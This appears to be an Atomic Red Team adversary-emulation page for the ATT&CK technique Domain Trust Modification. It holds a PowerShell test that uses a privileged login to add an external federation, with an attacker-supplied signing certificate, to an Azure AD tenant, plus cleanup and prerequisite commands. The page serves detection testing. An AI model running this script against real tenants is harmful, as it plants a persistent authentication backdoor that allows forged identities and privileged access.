Try it using Invoke-Atomic

Domain Trust Modification

Description from ATT&CK

Adversaries may add new domain trusts or modify the properties of existing domain trusts to evade defenses and/or elevate privileges. Domain trust details, such as whether or not a domain is federated, allow authentication and authorization properties to apply between domains for the purpose of accessing shared resources.(Citation: Microsoft - Azure AD Federation) These trust objects may include accounts, credentials, and other authentication material applied to servers, tokens, and domains.

Manipulating the domain trusts may allow an adversary to escalate privileges and/or evade defenses by modifying settings to add objects which they control. For example, this may be used to forge SAML Tokens, without the need to compromise the signing certificate to forge new credentials. Instead, an adversary can manipulate domain trusts to add their own signing certificate. An adversary may also convert a domain to a federated domain, which may enable malicious trust modifications such as altering the claim issuance rules to log in any valid set of credentials as a specified user.(Citation: AADInternals zure AD Federated Domain)

Atomic Tests

Atomic Test #1 - Add Federation to Azure AD

Add a new federation to Azure AD using PowerShell. The malicious Identity Provider to be added must be configured beforehand. If ADFS is used as IdP, the Uris parameters can be found at 'https://<federationservice>.<domainname>.com/federationmetadata/2007-06/federationmetadata.xml'

Supported Platforms: azure-ad

auto_generated_guid: 8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7

Inputs:

Name Description Type Default Value
azure_username Username of a privileged Azure AD account such as External Identity Provider Administrator or Global Administrator roles String bruce.wayne@contosocloud.com
azure_password Password of azure_username String iamthebatman
active_logon_uri Active Logon Uri, available in federation metadata at <SingleSignOnService Binding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST> field if ADFS is used. String https://sts.contoso.com/adfs/ls/
issuer_uri Issuer Uri, available in federation metadata at the "entityID" field if ADFS is used. String http://sts.contoso.com/adfs/services/trust
metadata_uri Metadata exchange Uri, available in federation metadata at <Address xmlns="http://www.w3.org/2005/08/addressing"> field if ADFS is used. String https://sts.contoso.com/adfs/services/trust/mex
public_key Public key of the X509 signing token certificate, in base64 String MzAgODIgMDEgMGEgMD…gZWQgOTkgMDIgMDMgMDEgMDAgMDE=
domain_name New federation domain name String contoso.com

Attack Commands: Run with powershell!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
Import-Module AzureADPreview
$PWord = ConvertTo-SecureString -String "#{azure_password}" -AsPlainText -Force
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{azure_username}", $Pword
Connect-AzureAD -Credential $Credential > $null
$federationSettings = New-Object Microsoft.Open.AzureAD.Model.DomainFederationSettings
$federationSettings.ActiveLogOnUri = "#{active_logon_uri}"
$federationSettings.IssuerUri = "#{issuer_uri}"
$federationSettings.LogOffUri = $federationSettings.ActiveLogOnUri
$federationSettings.MetadataExchangeUri = "#{metadata_uri}"
$federationSettings.PassiveLogOnUri = $federationSettings.ActiveLogOnUri
$federationSettings.PreferredAuthenticationProtocol = "WsFed"
$federationSettings.SigningCertificate = "#{public_key}"
$new = New-AzureADExternalDomainFederation -ExternalDomainName "#{domain_name}" -FederationSettings $federationSettings
if ($new) { Write-Host "`nFederation successfully added to Azure AD" } else { Write-Host "`nThe federation setup failed" }
Get-AzureADExternalDomainFederation -ExternalDomainName "#{domain_name}"
Write-Host "End of federation configuration."

Cleanup Commands:

1
2
3
4
5
6
7
8
try {
Import-Module AzureADPreview -ErrorAction Ignore
$PWord = ConvertTo-SecureString -String "#{azure_password}" -AsPlainText -Force
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{azure_username}", $Pword
Connect-AzureAD -Credential $Credential -ErrorAction Ignore
Remove-AzureADExternalFederationDomain -ExternalDomainName "#{domain_name}"
} catch {}

Dependencies: Run with powershell!

Description: AzureADPreview Powershell module must be installed. The Identity Provider to be federated must be configured (outside of the scope of this test).

Check Prereq Commands:

1
2
if (Get-Module AzureADPreview) {exit 0} else {exit 1}

Get Prereq Commands:

1
2
Install-Module -Name AzureADPreview -Force

source